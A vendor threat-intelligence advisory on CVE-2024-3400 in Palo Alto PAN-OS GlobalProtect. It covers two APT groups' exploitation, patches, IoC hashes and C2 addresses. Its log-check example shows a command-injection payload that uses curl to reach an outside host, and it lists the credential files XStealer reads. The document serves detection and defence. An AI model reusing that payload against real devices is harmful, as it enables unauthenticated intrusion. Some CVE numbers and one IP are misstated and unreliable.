Alerts of Exploiting Palo Alto GlobalProtect: CVE-2024-3400
>The following blog post is based on our April H2 Vulnerability Insights Report.
>
>TeamT5 Vulnerability Research Team is dedicated to providing timely mitigation and response guidelines to critical vulnerabilities. Contact us for more information about our vulnerability intelligence.
## Alerts of Exploiting Palo Alto Networks PAN-OS
TeamT5 released mitigation and response guidelines to a vulnerability in Palo Alto Networks PAN-OS software, CVE-2024-3400. CVE-2024-3400 is a arbitrary file creation vulnerability in the GlobalProtect portals of Palo Alto Networks PAN-OS software that will allow unauthenticated threat actors to execute arbitrary code and deploy malware to the targetsâ devices with root privilege.
Notably, CVE-2024-3400 has a pre-requitsite of enabling GlobalProtect gateway or portal. If enabled, the threat actors can exploits the arbitrary file creation vulnerability resulted from the GlobalProtect portals to achieve the command injection for remote code execution.
### Executive Summary
We assess the severity level of CVE-2024-3400 is critical and urge our customers to use this report to mitigate the effects. First, Proof of Concepts (PoC) exploiting CVE-2024-3400 have been circulating in the wild.[1] Second, Palo Alto confirmed the attack attempts that exploiting the vulnerability.[2] Last, public reports [3] [4] have revealed that state actors exploited CVE-2024-3400 in the attacks.
Our telemetry detected at least two APT groups exploiting CVE-2024-3400 since March 2024, SLIME60 and SLIME61, both are newly identified APT groups. We summarized the activities in the **Exploitation Status** subsection.
Based on the exploitation status, we depicted the Possible Attack Scenario in this report. We also concluded the IOCs in Appendix I: Malware and Appendix II: Indicators of Compromise (IoC). Most importantly, we prepare a comprehensive Mitigation and Response Advisory for our customers.
The Mitigation and Response Advisory includes:
- Mitigation Adversary
- Threat Hunting Tools, including two nuclei-based scanner:
- Nuclei-based UPStytle webshell scanner
- Nuclei-based scanner to check if your device is compromised via XStealer
### Exploitation Status
Threat actors have been actively exploiting CVE-2024-3400 since March 2024. Moreover, our telementry identified at least two APT groups, including China-nexus APT SLIME60 and a newly identified APT group, SLIME61.
- SLIME60 has exploited CVE-2024-3400 with XStealer since late April, 2024. The target scope includes manufacturing industry in Taiwan and education, medical, and manufacturing industry in Japan. Notably, based on Chinese characters in scripts from C2, we hold high confidence that SLIME60 is originated from China.
- SLIME61 (aka UTA0218) has exploited CVE-2024-3400 as zero-day with UPStyle web shell in several attacks, including an attack against manufacturing industry in Saudi Arabia.
### Affected Products
PAN-OS 10.2, PAN-OS 11.0, and PAN-OS 11.1 firewalls configured with GlobalProtect gateway or GlobalProtect portal (or both)
### Mitigation and Response Advisory
#### 1. Official Information
Palo Alto released the official mitigation advisory.
- Applying Vulnerability Protection to GlobalProtect Interfaces
- URL: https://live.paloaltonetworks.com/t5/globalprotect-articles/applying-vulnerability-protection-to-globalprotect-interfaces/ta-p/340184
The vulnerability is patched in PAN-OS 10.2.9-h1, PAN-OS 11.0.4-h1, PAN-OS 11.1.2-h3, and in all later PAN-OS versions. We recommend our customers to upgrade your Palo Alto Networks PAN-OS software to corresponding version.
Notably, while exploiting CVE-2024-3400 requires the GlobalProtect gateway or portal. Palo Alto has warned that disable the device telemetry is not an effective mitigation.
#### 2. Threat Hunting Tools
As state actors have actively exploited CVE-2024-3400, our vulnerability research team prepare two scanners for our customers to check if your devices has been attacked by the threat actors, including:
- Nuclei-based UPStytle webshell scanner
- Nuclei-based scanner to check if your device is compromised via XStealer
Our customers can download the tool from [Threat Hunting Tools](https://threatvision.org/downloads).
## Possible Attack Scenario
Threat actors have been actively exploiting CVE-2024-3400 since March 2024. We recommend our customer to check the PAN-OS CLI to find out if your device was attacked by the threat actors with following command:
```
> grep pattern "failed to unmarshal session(.\+.\/" mp-log gpsvc.log*
message:"failed to unmarshal session(./../../../opt/panlogs/tmp/device_telemetry/hour/aaa`curl${IFS}11.22.33.44:1234?user
```
Specifically, our telemetry identified at least two APT groups, including China-nexus APT SLIME60 and a newly identified APT group, SLIME61.
#### 1.SLIME60
SLIME60 has exploited CVE-2024-3400 since late April, 2024. The target scope includes manufacturing industry in Taiwan and education, medical, and manufacturing industry in Japan. In the attack, we identified three samples (Sample 1-3) of a new infostealer, XStealer.
|XStealer|SHA-256|
|-|-|
|Sample 1|5f4699232d6c95cb4b4b6390998fc754a751c6018d9fd79f22bf423de2430ca8|
|Sample 2|2cae066e5239bb69bdb7a7f36374e2493793576024c51e06f046a61f990ffce7|
|Sample 3|8ef883085b48c0e1b733640d171ebc574ddfd5a231620f10926f83573abe4317|
At runtime, XStealer can collect the network infra, access credential, and execute Linux commands to collect the system information. Such commands include: `whoami`, `/etc/passwd`, `/etc/host`, `hostname`, `ifconfig`, `uname`, `/etc/issue/`, `/etc/shadow`, `netstat, arp`, `ps`, `df -a`, `/etc/resolv.conf`, `crontab -l`, `bash_history`, `last -n 30`.
Notably, according to Chinese characters in the scripts, we hold high confidence that SLIME60 is originated from China.
Our customer can check the following path to find out if your devices is compromised by SLIME60: https://PA_OS_IP/global-protect/portal/css/results.css. We also provide a nuclei-based scanner for our customers. The scanner can be downloaded the tool from [Threat Hunting Tools](https://threatvision.org/downloads) (for TeamT5's customers).
#### 2. SLIME61
SLIME61 (aka UTA0218) has exploited CVE-2024-2400 as zero-day with UPStyle web shell in several attacks, including an attack against manufacturing industry in Saudi Arabia. Specifically, we identified four UPStyle[6] samples: Sample 4 and 5 are UPStyle web shells, whereas Sample 6 and 7 are UPStyle droppers that will drop a child sample (Sample 8) to `/usr/lib/python3.6/site-packages/system.pth`. The child sample is an UPStyle web shell.
|UPStyle|Feature|SHA-256|
|-|-|-|
|Sample 4|Web shell|ab3b9ec7bdd2e65051076d396d0ce76c1b4d6f3f00807fa776017de88bebd2f3|
|Sample 5|Web shell|710f67d0561c659aecc56b94ee3fc82c967a9647c08451ed35ffa757020167fb|
|Sample 6|Dropper|3de2a4392b8715bad070b2ae12243f166ead37830f7c6d24e778985927f9caac|
|Sample 7|Dropper|949cfa6514e499e28aa32feba800181558e60455b971206aa5aa601ea1f55605|
|Sample 8 (Child Sample)|Web shell|661b77ece99938090582d2e92e96417b20c2a7410bcc95e7f3959f40be066b34|
The C2 of the attacks are 144.172.79.92 and 172.233.228.93. Pivoting from the C2, we found more IP used by SLIME61:
- 66.235.168.222
- 89.187.187.69
We provide UPStyle scanner for the customers to check if your devices has been targeted by SLIME61. Our customers can download the tool from [Threat Hunting Tools](https://threatvision.org/downloads) (for TeamT5's customers).
### Appendix I: Malware Table
Below malware table summarize the malware used in attacks related to CVE-2023-26360.
<table>
<tr>
<th>Name</th>
<th>Type</th>
<th>Description</th>
<th>Attribution</th>
<th>First Seen</th>
</tr>
<tr>
<td>UPStyle</td>
<td>Web shell</td>
<td>UPStytle is a web shell specified for Palo Alto SSL VPN (PAN-OS). Actors send a request to Palo Alto VPN service to generate crafted error log, and UPStyle parse the error log to execute arbitrary commands.</td>
<td>SLIME61</td>
<td>2024.04</td>
</tr>
<tr>
<td>XStealer</td>
<td>Infostealer</td>
<td>XStealer is a generic information stealer specifed for UNIX-like platform, and it collects system information such as process list, network status, login credential, etc. Then, XStealer store those information into CSS file.</td>
<td>SLIME60</td>
<td>2024.04</td>
</tr>
</table>
### Appendix II: Indicators of Compromise (IoC)
hash
```
3de2a4392b8715bad070b2ae12243f166ead37830f7c6d24e778985927f9caac
661b77ece99938090582d2e92e96417b20c2a7410bcc95e7f3959f40be066b34
949cfa6514e499e28aa32feba800181558e60455b971206aa5aa601ea1f55605
ab3b9ec7bdd2e65051076d396d0ce76c1b4d6f3f00807fa776017de88bebd2f3
710f67d0561c659aecc56b94ee3fc82c967a9647c08451ed35ffa757020167fb
5f4699232d6c95cb4b4b6390998fc754a751c6018d9fd79f22bf423de2430ca8
2cae066e5239bb69bdb7a7f36374e2493793576024c51e06f046a61f990ffce7
8ef883085b48c0e1b733640d171ebc574ddfd5a231620f10926f83573abe4317
```
IP
``` 144.172.79.9 ``` <br>
``` 172.233.228.93 ``` <br>
``` 66.235.168.222 ``` <br>
``` 89.187.187.69 ```
### Appendix III: Other critical CVEs
Below link of another TeamT5 vulnerability report, **Patch Management Report (PMR)**. Published every two weeks (or more), the PMR will provide our customers with concise yet comprehensive updates on the most critical and exploitable vulnerabilities selected by TeamT5 vulnerability research team during the period. Each vulnerability will be provided with patch information. If you are interested in subscribing to this new report series, please contact TeamT5 for more information.
[Patch Management Report](https://threatvision.org/reports/vulnerability/pm-report/pmr-detail?pmReport=2023-Apr-2)
<br>
##Reference
1. https://github.com/pwnj0hn/CVE-2024-3400/blob/main/main.py
2. https://security.paloaltonetworks.com/CVE-2024-3400
3. https://www.volexity.com/blog/2024/04/12/zero-day-exploitation-of-unauthenticated-remote-code-execution-vulnerability-in-globalprotect-cve-2024-3400/
4. https://labs.watchtowr.com/palo-alto-putting-the-protecc-in-globalprotect-cve-2024-3400/
5. https://threatvision.org/downloads
6. UPStyle first identified and named by Volexity during the investigation on SLIME61âs attacks exploiting CVE-2024-3400. https://www.volexity.com/blog/2024/04/12/zero-day-exploitation-of-unauthenticated-remote-code-execution-vulnerability-in-globalprotect-cve-2024-3400/
>**Threat Analyst Summit 2024 : Call for Presentations !**
>In the ever-evolving landscape of cybersecurity, staying one step ahead is not just an advantage â it's imperative. Join us at this year's Threat Analyst Summit, where we bring together the brightest minds in the industry to explore, learn, and collaborate. Our theme, "Stay Informed, Stay Secure", underscores the critical role of continuous intelligence in safeguarding against emerging threats.
>With the rapid evolution of ICT, TeamT5 encourages pioneering research that addresses not only technical challenges but also the legal, policy, economic, psychological, and societal aspects of cybersecurity. We invite you to submit presentations.
>- Final Deadline for Submissions: August 15, 2024, 22:00 UTC+8 (14:00 UTC+0)
>- More info: [link](https://tas2024.teamt5.org/CFP?utm_source=event&utm_medium=website)
The Threat Codex
CyberVeille.ch
Not Simon
HD Moore